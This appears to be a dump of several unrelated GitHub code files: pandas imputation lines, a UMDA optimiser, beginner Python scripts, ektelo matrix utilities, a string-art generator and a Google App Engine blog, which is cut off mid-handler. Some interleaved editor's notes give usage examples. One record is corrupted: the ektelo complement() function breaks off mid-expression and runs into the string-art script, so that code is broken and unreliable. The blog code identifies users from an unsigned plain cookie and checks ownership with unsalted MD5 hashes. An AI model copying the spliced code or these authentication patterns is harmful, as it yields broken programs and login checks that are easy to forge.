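print(df.fillna(df.mean()))           # mode "mean"
print(df.fillna(df.median()))         # mode "median"
print(df.fillna(df.mode().iloc[0]))   # mode "modusz": first row of the per-column modes
print(df.dropna())                    # mode "del"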
+{"seq_id":"14453793188","text":"import numpy as np\n\nclass UMDA:\n class Solution:\n def __init__(self, bitstring, fitness) -> None:\n self.bitstring = bitstring\n self.fitness = fitness\n\n def __init__(self, fitness_function, validation_function, num_generations, population_size, parent_size, offspring_size) -> None:\n self.num_generations = num_generations\n self.fitness_function = fitness_function\n self.validation_function = validation_function\n self.offspring_size = offspring_size\n self.parent_size = parent_size\n self.population_size = population_size\n\n def generate_single_solution(self, item_probability_vector, nr_of_items) -> Solution:\n bitstring = []\n for i in range(nr_of_items):\n if np.random.rand() <= item_probability_vector[i] and self.validation_function(bitstring):\n bitstring.append(1)\n else:\n bitstring.append(0)\n \n return self.Solution(bitstring, self.fitness_function(bitstring))\n\n def generate_random_population(self, nr_of_items):\n uniform_dist = [0.5 for _ in range(nr_of_items)]\n return [self.generate_single_solution(uniform_dist, nr_of_items) for _ in range(self.population_size)]\n\n def calculate_distribution(self, parents, nr_of_features):\n univariate_freqs = [0 for _ in range(nr_of_features)]\n\n for solution in parents:\n for index1 in range(len(solution.bitstring)):\n item1 = solution.bitstring[index1]\n if item1 == 1:\n univariate_freqs[index1] += 1\n\n for index in range(len(univariate_freqs)):\n univariate_freqs[index] /= self.parent_size\n \n\n return univariate_freqs\n\n\n def generate_new_individual(self, univariate_freqs):\n individual = [0 for _ in univariate_freqs]\n\n counter = 0\n for chance in univariate_freqs:\n if np.random.rand() <= chance:\n individual[counter] = 1 \n else:\n individual[counter] = 0 \n counter += 1\n\n return individual\n\n def parent_selection(self, population):\n population.sort(key=lambda x: x.fitness, reverse=True)\n return population[:self.parent_size]\n\n def generate_offspring(self, univariate_freqs):\n offspring = []\n for _ in range(self.offspring_size):\n while True:\n new_individual = self.generate_new_individual(univariate_freqs)\n individual_fitness = self.fitness_function(new_individual)\n if (self.validation_function(new_individual)):\n offspring.append(self.Solution(new_individual, individual_fitness))\n break\n\n return offspring\n\n def calculate(self, nr_of_features):\n population = self.generate_random_population(nr_of_features)\n best_results = []\n for generation in range(self.num_generations):\n parents = self.parent_selection(population)\n univariate_dist = self.calculate_distribution(parents, nr_of_features)\n offspring = self.generate_offspring(univariate_dist)\n population += offspring\n population.sort(key=lambda x: x.fitness, reverse=True)\n population = population[:self.population_size]\n best_results.append(population[0])\n\n return best_results","repo_name":"dominikcondric/EDA-algorithms","sub_path":"algorithms/umda.py","file_name":"umda.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
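Editor's note: a hedged usage sketch for the UMDA class above, on the classic OneMax problem. The fitness and validation callables are illustrative; only the constructor signature, calculate(), and the Solution.fitness attribute come from the code above.

def onemax(bits):          # fitness: number of ones in the bitstring
    return sum(bits)

def always_valid(bits):    # OneMax is unconstrained, so every (partial) bitstring is valid
    return True

solver = UMDA(fitness_function=onemax, validation_function=always_valid,
              num_generations=20, population_size=50,
              parent_size=20, offspring_size=30)
best_per_generation = solver.calculate(nr_of_features=16)
print(best_per_generation[-1].fitness)  # should approach 16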
 +{"seq_id":"827003696","text":"num=int(input(\"Enter a number: \")) #User enters the number \r\n\r\nif num > 0: #Check whether the number is greater than 0 \r\n print(\"The number entered is positive.\") #If greater than 0, it is positive\r\nelse:\r\n if num == 0: #Check whether it equals 0\r\n print(\"The number entered is neither positive nor negative; it is 0.\") #If equal to 0, report that it is neither positive nor negative, but 0\r\n else: #If the number is neither greater than nor equal to 0, it is negative\r\n print(\"The number entered is negative.\")\r\n\r\n#Leonardo Ribeiro Leonardi\r\n#Determine whether the entered number is positive or negative.\r\n#07/05/2019","repo_name":"leonardo99i/MyCodes","sub_path":"Positivo ou Negativo.py","file_name":"Positivo ou Negativo.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7757589635","text":"from __future__ import division\nfrom builtins import zip\nfrom ektelo import util\nfrom ektelo.matrix import EkteloMatrix\nfrom functools import reduce\nimport math\nimport numpy as np\nfrom scipy import sparse\nfrom ektelo import workload\n\ndef cantor_pairing(a, b):\n \"\"\"\n A function returning a unique positive integer for every pair (a,b) of positive integers\n \"\"\"\n return (a+b)*(a+b+1)/2 + b\n \ndef _replace(vector, new_values):\n for i in range(len(vector)):\n vector[i] = new_values[ vector[i] ]\n return vector\n\ndef get_partition_vec(rank,n,cluster,closeRange=False):\n \"\"\" get the partition vector from clusters returned by partition algorithms\n rank: If the bins are sorted, give the rank of each item in the input list.\n Used by AHP partition. Set rank = None if not used.\n n: Length of vector in original domain\n cluster: Cluster/partition returned by partition algorithms\n closeRange: if set to True, ranges in clusters are close range. (DAWA partition)\n i.e. [a,b] indicates [a,a+1,...b-1,b]\n if set to False, ranges in clusters are default python representation. (AHP partition)\n i.e. 
[a,b] indicates [a,a+1,...b-1]\n \"\"\"\n partition_vec_sorted = np.empty(n,int)\n assert cluster[0][0] == 0,\"First bin of partition must start with 0\"\n # assign groupID to elements in sorted list.\n for i in range(len(cluster)):\n if closeRange:\n assert cluster[-1][1] == n-1, \" Last bin of partition must end with length of original data\"\n partition_vec_sorted[cluster[i][0]:cluster[i][1]+1] = i\n else:\n assert cluster[-1][1] == n, \" Last bin of partition must end with length of original data\"\n partition_vec_sorted[cluster[i][0]:cluster[i][1]] = i\n # get index in sorted list for elements in original domain, then get groupID.\n if rank is None:\n partition_vec = partition_vec_sorted\n else:\n partition_vec = np.array([partition_vec_sorted[rank[i]] for i in range(n)] )\n\n return partition_vec\n\n\ndef update_corners(corner, groupID, row, start, end):\n ''' helper function for get_subdomain\n update corners coordinates for a certain group.\n return False if the domain is not rectangular\n '''\n # if it is the first ocurrence of the group\n # update the upper left and upper right corner\n if groupID not in corner:\n corner[groupID] = {'ul':(row, start),'ur':(row,end), 'll':(row, start),'lr':(row,end)}\n else:\n temp = corner[groupID]\n if row == temp['ll'][0]: # incontinous group on the upper line\n return False \n\n # update the lower corners\n # make sure the columns match and rows are continous.\n if temp['ll'][1] == start and temp['lr'][1] == end and temp['ll'][0] == row-1:\n # move the lower corners one line lower\n corner[groupID]['ll'] = (temp['ll'][0]+1, temp['ll'][1])\n corner[groupID]['lr'] = (temp['lr'][0]+1, temp['lr'][1])\n else:\n return False\n\n return True\n\n\n\ndef get_subdomain_grid(mapping, domain_shape):\n '''\n Given a mapping, return the domain size of all the subdomain when it is \n used by the SplitByPartition operator.\n The original domain needs to be 2D and the mapping should split the domain \n to smaller grids. Non-rectangular subdomain shapes are not supported,\n None will be returned.\n\n '''\n assert len(domain_shape) == 2 , 'Only works for 2D domains'\n m, n = domain_shape\n # unflatten the mapping vector\n mapping = mapping.reshape(domain_shape)\n corners = {}\n # record corners of each group in one pass of the mapping vector\n for i in range(m):\n start = 0\n for j in range(n):\n if j+1 >= n or mapping[i][j] != mapping[i][j+1]:\n groupID = mapping[i][start]\n status = update_corners(corners, groupID, i, start, j)\n start = j+1\n if status == False:\n return None\n\n # calculate subdomains from corners\n sub_domains = {}\n for g in corners:\n temp = corners[g]\n sub_domains[g] = (temp['ll'][0] - temp['ul'][0] + 1, temp['ur'][1] - temp['ul'][1] + 1)\n\n return sub_domains\n\n\ndef canonical_ordering(mapping):\n \"\"\" remap according to the canonical order.\n if bins are noncontiguous, use position of first occurrence.\n e.g. 
[3,4,1,1] => [1,2,3,3]; [3,4,1,1,0,1]=>[0,1,2,2,3,2]\n \"\"\"\n unique, indices, inverse, counts = mapping_statistics(mapping)\n\n uniqueInverse, indexInverse = np.unique(inverse,return_index =True)\n\n indexInverse.sort()\n newIndex = inverse[indexInverse]\n tups = list(zip(uniqueInverse, newIndex)) \n tups.sort(key=lambda x: x[1])\n u = np.array( [u for (u,i) in tups] )\n mapping = u[inverse].reshape(mapping.shape)\n\n return mapping\n\n\ndef mapping_statistics(mapping):\n return np.unique(mapping, return_index=True, return_inverse=True, return_counts=True) \n\n\n\n\ndef reduction_matrix(mapping, canonical_order=False):\n \"\"\" Returns an m x n matrix R where n is the dimension of \n the original data and m is the dimension of the reduced data.\n\n Reduces data vector x with R x\n Expands workload matrix W with W' R\n \"\"\"\n assert mapping.ndim == 1, \"Can only handle 1-dimesional mappings for now, domain should be flattened\"\n\n unique, indices, inverse, counts = mapping_statistics(mapping)\n\n if canonical_order:\n mapping = canonical_ordering(mapping)\n\n n = mapping.size\n m = unique.size\n data = np.ones(n)\n cols = np.arange(n)\n rows = inverse\n\n return EkteloMatrix(sparse.csr_matrix((data, (rows, cols)), shape=(m, n), dtype=int))\n\ndef expansion_matrix(mapping, canonical_order=False):\n \"\"\" Returns an n x m matrix E where n is the dimension of \n the original data and m is the dimension of the reduced data.\n\n Expands data vector x with E x'\n Reduces workload matrix W with W E\n \"\"\"\n assert mapping.ndim == 1, \"Can only handle 1-dimesional mappings for now, domain should be flattened\"\n\n unique, indices, inverse, counts = mapping_statistics(mapping)\n\n if canonical_order:\n mapping = canonical_ordering(mapping)\n\n n = mapping.size\n m = unique.size\n data = np.ones(n)\n cols = np.arange(n)\n rows = inverse\n\n R = sparse.csr_matrix((data, (rows, cols)), shape=(m, n), dtype=int)\n scale = sparse.spdiags(1.0 /counts, 0, m, m)\n\n return EkteloMatrix(R.T * scale)\n\ndef projection_matrix(mapping, idx):\n \"\"\" Returns m x n matrix P where n is the dimension of the \n original data and m is the number of occurence of idx\n in mapping.\n\n :param mapping: vector with indices representing groups\n :param idx: index of group from which to create projection\n\n Projects vector x with P x and matrix W with W P^T\n Unprojects vector x with P^T x and matrix W with W P\n \"\"\"\n mask = np.ma.masked_where(mapping!=idx, mapping).mask\n\n if np.all(~mask): # when all entries are False, a single False will be returned\n mask = np.array([False]*len(mapping))\n\n cols = np.where(~mask)[0]\n rows = np.arange(cols.size)\n vals = np.ones_like(rows)\n P = sparse.csr_matrix((vals, (rows, cols)), (rows.size, mask.size))\n\n return EkteloMatrix(P)\n\ndef combine(p1, p2):\n \"\"\" Returns p3, an (n+m) dimensional array of integers such that\n p3[i,j] = p3[i', j'] iff p1[i] = p1[i'] and p2[j] = p2[j']\n\n :param p1: an n dimensional array of integers\n :param p2: an m dimensional array of integers\n \"\"\"\n _, i1 = np.unique(p1.flatten(), return_inverse=True)\n _, i2 = np.unique(p2.flatten(), return_inverse=True)\n lookup = np.arange(i1.size * i2.size).reshape(i1.size, i2.size)\n # note: cartesian product, but order is very important\n # this order works when flattening/reshaping is done in row-major form\n pairs = np.dstack(np.meshgrid(i1, i2, indexing='ij')).reshape(-1,2)\n flat = lookup[pairs[:,0], pairs[:,1]]\n\n return flat.reshape(p1.shape + p2.shape)\n\n\ndef 
combine_all(mappings):\n \"\"\" Returns an ndarray with each dimension corresponding to one\n of mapping.\n \"\"\"\n return reduce(combine, mappings, np.ones((), dtype=int))\n\n\ndef extract_M(W):\n assert type(W) is sparse.csr_matrix, 'W must by csr_sparse'\n\n return W.getrow(W.nonzero()[0][0])\n\n\ndef complement(A, grid_size=None):\n '''return the queries on the complementary domain\n :param grid_size: The griding size of the new queris, if None, return total on the complementary domain\n Currently complementary domain are those indices with column norm(L1) 0.\n '''\n comp = []\n if isinstance(A, np.ndarray) is False:\n A = A.toarray()\n norm = np.linalg.norm(A,ord = 1,axis = 0)\n\n compl_size = len(norm) - np.count_nonzero(norm)\n grid_size = compl_size if grid_size is None else grid_size\n grid_num = int(math.ceil(compl_size/float(grid_size)))\n if grid_num==0:\n return None\n\n ind = 0\n for g in range(grid_num):\n q = np.zeros(len(norm))\n remain_in_group = grid_size\n while (remain_in_group>0) and (ind1, 1->2, 2->5 ... | True: 0->1, 0->2, 0->5, ...\n# End of settings\n\nImagePath = f\"./img/{input('Image: ')}\"\nImagePath += \".jpg\" if os.path.exists(ImagePath + \".jpg\") else \".png\"\noriginalImage = (\n Image.open(ImagePath)\n .resize((Size, Size))\n .convert(\"L\"))\n\noriginalImageArray = np.array(originalImage)\ncurrentImageArray = np.zeros((Size, Size), np.uint8)\n\nif livePreview:\n import pygame\n originalImage = pygame.image.frombytes(\n Image.open(ImagePath).resize((Size, Size)).convert(\"RGB\").tobytes(),\n (Size, Size),\n \"RGB\")\n WIN = pygame.display.set_mode((Size * 2, Size)) \n pygame.display.set_caption(f\"String Art - {ImagePath}\") \n WIN.blit(originalImage, (0, 0))\n pygame.display.update()\n\nskipIfBadLine = skipIfBadLine and not structured\nrun = True\nnails = [\n (\n int(Size / 2 + (Size / 2 - 10) * math.cos(2 * math.pi * i / Dots)),\n int(Size / 2 + (Size / 2 - 10) * math.sin(2 * math.pi * i / Dots)),\n ) for i in range(Dots)]\n\ndef bresenham(x0, y0, x1, y1):\n img = np.zeros((Size, Size), dtype=bool)\n dx = x1 - x0\n dy = y1 - y0\n xsign = 1 if dx > 0 else -1\n ysign = 1 if dy > 0 else -1\n dx, dy = abs(dx), abs(dy)\n if dx > dy:\n xx, xy, yx, yy = xsign, 0, 0, ysign\n else:\n dx, dy = dy, dx\n xx, xy, yx, yy = 0, ysign, xsign, 0\n D, y = 2 * dy - dx, 0\n for x in range(dx + 1):\n img[y0 + x * xy + y * yy][x0 + x * xx + y * yx] = True\n D += 2 * dy\n if D >= 0:\n y += 1\n D -= 2 * dx\n return (Color * img).astype(np.uint8)\n\ndef drawLine(start, end):\n return np.maximum.reduce([currentImageArray, (currentImageArray + bresenham(*nails[start], *nails[end]))]).clip(0, 255)\n\n\ndef difference(start, end):\n return cv2.norm(\n drawLine(start, end),\n originalImageArray,\n cv2.NORM_L2\n )\n\ndef findBest(origin):\n best = None\n i = 0\n while i < Dots:\n if i != origin:\n diff = difference(origin, i)\n if best == None or diff < best[2]:\n best = (origin,i,diff,)\n elif skipIfBadLine: i += int((Dots * 0.05) * random.random())\n i += 1\n return best\n\ndef update():\n if not livePreview: return\n current = pygame.image.frombytes(Image.fromarray(currentImageArray).convert(\"RGB\").tobytes(), (Size, Size), \"RGB\")\n WIN.blit(current, (Size, 0))\n pygame.draw.line(WIN, (255, 255, 255), (Size, 0), (Size, Size))\n pygame.display.update((Size, 0, Size * 2, Size))\n\ndef events():\n if not livePreview: return\n global run\n for e in pygame.event.get():\n if e.type == pygame.QUIT: run = False\n\ndef main():\n global currentImageArray, run\n startNail = 0\n 
currentNail = (random.randint(0, Dots - 1) if continuousLine else startNail)\n history = [(currentNail, currentNail)]\n startTime = time.time()\n diff = 0\n lastDiff = math.inf\n disconnects = 0\n fullLoop = False\n\n def stats():\n os.system(\"cls\")\n print(\n tabulate(\n headers=[\"statistic\", \"value\"],\n tabular_data=[\n [\"Time elapsed\",time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - startTime)),],\n [\"Connections made\", len(history)],\n [\"\", \"\"],\n [\"Time per Line\", f\"{(time.time() - startTime) / len(history):.4f}s\",],\n [\"Similarity Score\", f\"{diff:.4f}\"],\n [\"Improvement\", f\"{(diff - lastDiff):.4f}\"],\n [\"Current Start\", startNail if not continuousLine else \"N/A\"],\n [\"Disconnects\", disconnects if not continuousLine else \"N/A\"],\n [\"Continuous Line\",continuousLine if not continuousLine else \"N/A\",],\n [\"\", \"\"],\n [\"image\", ImagePath],\n [\"dots\", Dots],\n [\"size\", Size],\n [\"color\", Color],\n ],\n tablefmt=\"rounded_outline\",\n )\n )\n\n def save():\n savePath = f\"./results/{time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime())}/\"\n os.makedirs(savePath) \n Image.fromarray(currentImageArray).convert(\"RGB\").save(savePath + \"result.png\")\n with open(savePath + \"history.json\", \"w\") as f:\n json.dump(history, f)\n with open(savePath + \"stats.json\", \"w\") as f:\n json.dump(\n {\n \"Time elapsed\": time.strftime(\n \"%H:%M:%S\", time.gmtime(time.time() - startTime)\n ),\n \"Connections made\": len(history),\n \"Time per Line\": f\"{(time.time() - startTime) / len(history):.4f}s\",\n \"Similarity Score\": f\"{diff:.4f}\",\n \"Improvement\": f\"{(diff - lastDiff):.4f}\",\n \"Current Start\": startNail,\n \"Disconnects\": disconnects,\n \"continuousLine\": continuousLine,\n \"image\": ImagePath,\n \"dots\": Dots,\n \"size\": Size,\n \"color\": Color,\n },\n f,\n indent=4,\n )\n\n update()\n stats()\n events()\n\n while run:\n currentNail, endNail, diff = findBest(currentNail)\n if (diff - lastDiff) < 0:\n currentImageArray = drawLine(currentNail, endNail)\n history.append((currentNail, endNail))\n currentNail = endNail\n\n elif (diff - lastDiff) >= 0 or structured:\n if not continuousLine:\n disconnects += 1\n startNail += 1\n if (startNail >= Dots):\n startNail = 0\n if fullLoop: run = False\n else: fullLoop = True\n currentNail = startNail\n else: run = False\n \n elif continuousLine: fullLoop = False\n if len(history) % 100 == 0 or len(history) < 100:\n update()\n stats()\n events()\n \n lastDiff = diff\n\n update()\n stats()\n if saveIt:\n save()\nmain()","repo_name":"flloschy/Jams","sub_path":"StringArt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
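Editor's note: the inner loop of the string-art script above is a greedy search: among all candidate chords, keep the one whose rendering brings the canvas closest to the target in L2 distance (cv2.norm with NORM_L2 computes the same metric as np.linalg.norm here). A self-contained sketch of that step on tiny illustrative images:

import numpy as np

def greedy_pick(target, canvas, candidate_lines):
    """Pick the candidate line whose addition brings the canvas
    closest (in L2 norm) to the target image."""
    best_idx, best_err = None, np.inf
    for i, line in enumerate(candidate_lines):
        trial = np.maximum(canvas, line)  # drawing only brightens pixels
        err = np.linalg.norm(trial.astype(float) - target.astype(float))
        if err < best_err:
            best_idx, best_err = i, err
    return best_idx, best_err

target = np.array([[0, 200], [200, 0]], dtype=np.uint8)
canvas = np.zeros((2, 2), dtype=np.uint8)
lines = [np.eye(2, dtype=np.uint8) * 200, np.fliplr(np.eye(2, dtype=np.uint8)) * 200]
print(greedy_pick(target, canvas, lines))  # picks index 1, the anti-diagonal line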
 +{"seq_id":"70652600441","text":"#Dictionaries consist of key/value pairs. Dictionaries are ordered, mutable, and do not allow duplicates.\n\n#Access via the keys\na = {\n \"eins\" : 1,\n \"zwei\" : 2,\n \"drei\" : 3\n}\nprint(a)\nprint(a[\"drei\"])\n\n#Display all keys of the dictionary with the keys method\nx = a.keys()\nprint(x)\n\n#Assign a new key/value pair. Existing keys can also be assigned new values.\na[\"vier\"] = 4\nprint(a)\n\n#Display all values with the values method\ny = a.values()\nprint(y)\n\n#Represent all key/value pairs as tuples in a list\nz = a.items()\nprint(z)\n\n#Assign a new key/value pair, or assign to an existing key, with the update method\nb = {\"Steve\": \"Jobs\", \"Elon\" : \"Musk\"}\na.update(b)\nprint(a)","repo_name":"eemsar/PythonUnterlagen","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37916866336","text":"import os\nimport re\nfrom string import letters\nimport webapp2\nimport jinja2\nimport json\n\n# random, string, hashlib used for salted hashed password generation\nimport random\nimport string\nimport hashlib\n\nimport time\n\n# TODO\n# time library is to create short delay before reloading to compensate for\n# eventual consistency. This is a temporary fix until\n# I can better understand ancestor queries\n\n\nfrom google.appengine.ext import db\n\nfrom models import User, Wags, Comments, Post, render_str\n\n\ndef users_key(group = \"default\"):\n return db.Key.from_path(\"users\", group)\n\nclass AddWag(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n wagged_user = self.request.cookies.get(\"current_user\")\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n data = json.loads(self.request.body)\n post_to_wag = Post.get_by_id(int(data['storyKey']), parent = blog_key())\n # post_to_wag = Post.Key(Post, data['storyKey']).get()\n p = Wags(parent = blog_key(), wagged_user = wagged_user,\n wagged_post = data['storyKey'])\n p.put()\n\n # updates wag field.\n current_wags = post_to_wag.wags\n new_wags = current_wags + 1\n post_to_wag.wags = new_wags\n post_to_wag.put()\n self.response.out.write(json.dumps({'posts': {'wags': new_wags, 'storyKey': int(data['storyKey'])}}))\n else:\n self.redirect(\"/blog/login\")\n\n\nclass RemoveWag(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n data = json.loads(self.request.body)\n unwagged_user = self.request.cookies.get(\"current_user\")\n unwagged_post = data['postKey']\n # unwagged user also gets the logged in user\n if unwagged_user:\n unwag = db.GqlQuery(\"SELECT * from Wags WHERE wagged_post = :1 \"\n + \"AND wagged_user = :2\", unwagged_post, unwagged_user)\n db.delete(unwag)\n post_to_unwag = Post.get_by_id(int(data['postKey']), parent = blog_key())\n current_wags = post_to_unwag.wags\n new_wags = (current_wags - 1)\n post_to_unwag.wags = new_wags\n post_to_unwag.put()\n self.response.out.write(json.dumps({'posts': {'wags': new_wags, 'postKey': int(data['postKey'])}}))\n else:\n self.redirect(\"/blog/login\")\n\n\nclass DeletePost(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n user_who_deleted = self.request.cookies.get(\"current_user\")\n post_to_delete = self.request.get(\"post_key\")\n micro_check = self.request.cookies.get(\"microchip\")\n delete_record = 
Post.get_by_id(int(post_to_delete),\n parent = blog_key())\n post_poster = make_microchip_hash(delete_record.poster)\n # user_who_deleted gets the current logged in user\n if micro_check == post_poster:\n db.delete(delete_record)\n delete_related_comments=db.GqlQuery(\"SELECT * from Comments WHERE \"\n + \"comment_post = :1\", post_to_delete)\n db.delete(delete_related_comments)\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\nclass DeleteComment(webapp2.RequestHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n user_who_deleted = self.request.cookies.get(\"current_user\")\n comment_to_delete = self.request.get(\"comment_key\")\n current_post = self.request.get(\"post_key\")\n micro_check = self.request.cookies.get(\"microchip\")\n delete_record = Comments.get_by_id(int(comment_to_delete),\n parent = blog_key())\n comment_poster = make_microchip_hash(delete_record.comment_user)\n # user_who_deleted gets the current logged in user\n if micro_check == comment_poster:\n db.delete(delete_record)\n self.redirect(\"/blog/\" + current_post)\n else:\n self.redirect(\"/blog/login\")\n\n# generate random string for password\ndef make_salt(length = 5):\n return \"\".join(random.choice(string.lowercase) for i in range(length))\n\ndef make_microchip_hash(s):\n hm = hash_str(s)\n return hm\n\ndef make_pw_hash(username, password, salt = None):\n if not salt:\n salt = make_salt()\n h = hashlib.sha256(username + password + salt).hexdigest()\n return \"%s|%s\" % (h, salt)\n\ndef valid_pw(name, pw, h):\n salt = h.split(\"|\")[1]\n return h == make_pw_hash(name, pw, salt)\n\n# functions for cookies and hashing\ndef hash_str(s):\n return hashlib.md5(s).hexdigest()\n\ndef make_secure_val(s):\n return \"%s|%s\" % (s, hash_str(s))\n\ndef check_secure_val(hs):\n val = hs.split(\"|\")[0]\n if hs == make_secure_val(val):\n return val\n\nclass BlogHandler(webapp2.RequestHandler):\n def write(self, *a, **kw):\n self.response.out.write(*a, **kw)\n\n def render_str(self, template, **params):\n params[\"user\"] = self.request.get(\"username\")\n params[\"current_user\"] = self.request.cookies.get(\"current_user\")\n params[\"comment\"] = self.request.get(\"comment\")\n return render_str(template, **params)\n\n def render(self, template, **kw):\n self.write(self.render_str(template, **kw))\n\n def set_secure_cookie(self, name, val):\n cookie_val = make_secure_val(val)\n self.response.headers.add_header(\n \"Set-Cookie\",\n \"%s = %s; Path = /\" % (name,cookie_val))\n\n def login(self, user):\n self.set_secure_cookie(\"user_id\", str(user.key().id()))\n\ndef render_post(response, post):\n response.out.write(\"\" + post.subject + \"
    \")\n response.out.write(post.content)\n response.out.write(post.poster)\n\nclass MainPage(BlogHandler):\n def get(self):\n self.redirect(\"/blog\")\n\n# set blog key in case we decide to have additional blogs\ndef blog_key(name = \"default\"):\n return db.Key.from_path(\"blogs\", name)\n\n# front page of blog at /blog, display 10 latest posts\nclass BlogFront(BlogHandler):\n def get(self):\n posts = Post.all().order('-created')\n front_page=1\n logged_in = self.request.cookies.get(\"current_user\")\n current_user = self.request.cookies.get(\"current_user\")\n user_wags = db.GqlQuery(\"SELECT wagged_post from Wags WHERE \"\n + \"wagged_user = :1\", current_user)\n myList = []\n for u in user_wags:\n myList.append(u.wagged_post)\n time.sleep(0.2)\n self.render(\"front.html\", posts = posts, logged_in = logged_in,\n current_user = current_user, myList = myList,\n front_page = front_page)\n\nclass EditPost(BlogHandler):\n def get(self):\n poster = self.request.get(\"poster\")\n post_to_edit = self.request.get(\"post_key\")\n subject = self.request.get(\"subject\")\n content = self.request.get(\"content\")\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in == poster:\n if post_to_edit:\n self.render(\"editpost.html\", subject = subject, content = content,\n poster = poster, post_to_edit = post_to_edit, newpost_page = 1,\n logged_in = logged_in)\n else:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n poster = self.request.get(\"poster\")\n post_to_edit = self.request.get(\"post_key\")\n subject = self.request.get(\"subject\")\n content = self.request.get(\"content\")\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in == poster:\n self.render(\"editpost.html\", subject = subject, content = content,\n poster = poster, post_to_edit = post_to_edit, newpost_page = 1,\n logged_in = logged_in)\n else:\n self.redirect(\"/login\")\n\nclass AddComment(BlogHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n comment_user = self.request.cookies.get(\"current_user\")\n comment_post = self.request.get(\"post_key\")\n comment_text = self.request.get(\"comment\")\n # comment_user also contains logged in user info\n if comment_user:\n if comment_text:\n c = Comments(parent = blog_key(), comment_user = comment_user,\n comment_post = comment_post, comment_text=comment_text)\n c.put()\n self.redirect(\"/blog/\" + comment_post)\n else:\n #TODO: add error if no text added\n self.redirect(\"/blog/\" + comment_post + \"?comment=True\")\n else:\n self.redirect(\"/blog/login\")\n\n\nclass EditComment(BlogHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n current_user = self.request.cookies.get(\"current_user\")\n current_post = self.request.get(\"post_key\")\n comment_to_edit = self.request.get(\"comment_key\")\n comment_text = self.request.get(\"comment_text\")\n micro_check = self.request.cookies.get(\"microchip\")\n edit_record = Comments.get_by_id(int(comment_to_edit),\n parent = blog_key())\n post_owner = make_microchip_hash(edit_record.comment_user)\n # current_user contains login info\n if micro_check == post_owner:\n self.render(\"editcomment.html\", current_user = current_user,\n current_post = current_post, comment_to_edit = comment_to_edit,\n 
comment_text = comment_text)\n else:\n self.redirect(\"/blog/login\")\n\nclass SaveComment(BlogHandler):\n def get(self):\n logged_in = self.request.cookies.get(\"current_user\")\n if logged_in:\n self.redirect(\"/blog\")\n else:\n self.redirect(\"/blog/login\")\n\n def post(self):\n current_user = self.request.cookies.get(\"current_user\")\n current_post = self.request.get(\"post_key\")\n comment_to_edit=self.request.get(\"comment_key\")\n comment_text = self.request.get(\"comment\")\n micro_check = self.request.cookies.get(\"microchip\")\n edit_record = Comments.get_by_id(int(comment_to_edit),\n parent = blog_key())\n comment_owner = make_microchip_hash(edit_record.comment_user)\n # current_user contains login info\n if micro_check == comment_owner:\n if comment_to_edit:\n if comment_text:\n edit_record.comment_text = comment_text\n edit_record.put()\n self.redirect(\"/blog/\" + current_post)\n else:\n error = \"Please enter the comment.\"\n self.render(\"editcomment.html\", current_user = current_user,\n current_post = current_post,\n comment_to_edit = comment_to_edit,\n error = error, comment_text = comment_text)\n else:\n self.redirect(\"blog/\" + post_key)\n else:\n self.redirect(\"blog/login\")\n\n\nclass WelcomeRedirect(webapp2.RequestHandler):\n def get(self):\n self.redirect(\"/blog/signup\")\n\n# get the selected post from the current blog\nclass PostPage(BlogHandler):\n def get(self, post_id):\n key = db.Key.from_path(\"Post\", int(post_id), parent = blog_key())\n post = db.get(key)\n logged_in = self.request.cookies.get(\"current_user\")\n comments_to_show = db.GqlQuery(\"SELECT * from Comments WHERE \"\n + \"comment_post = :1 ORDER BY created ASC\", post_id)\n comment_list_count = comments_to_show.count()\n if comment_list_count >= 1:\n comment_list = comments_to_show\n else:\n comment_list = \"No Comments\"\n if not post:\n self.error(404)\n return\n time.sleep(0.2)\n self.render(\"permalink.html\", post = post, comment_list = comment_list,\n permalink_page = 1, logged_in = logged_in)\n\n\n# pertaining to creating a new post\nclass NewPost(BlogHandler):\n def get(self):\n poster = self.request.get(\"poster\")\n logged_in = self.request.get(\"logged_in\")\n if logged_in:\n self.render(\"newpost.html\", poster = poster, newpost_page = 1,\n logged_in = logged_in)\n else:\n self.redirect(\"/blog/login\")\n\n\n def post(self):\n poster = self.request.get(\"poster\")\n subject = self.request.get(\"subject\")\n content = self.request.get(\"content\")\n # post_to_edit variable is in case it is an edit, will be blank if new post\n # otherwise, the inputs will fill with the values of the post\n post_to_edit = self.request.get(\"post_key\")\n logged_in = self.request.cookies.get(\"current_user\")\n micro_check = self.request.cookies.get(\"microchip\")\n if post_to_edit:\n edit_record = Post.get_by_id(int(post_to_edit),\n parent = blog_key())\n post_poster = 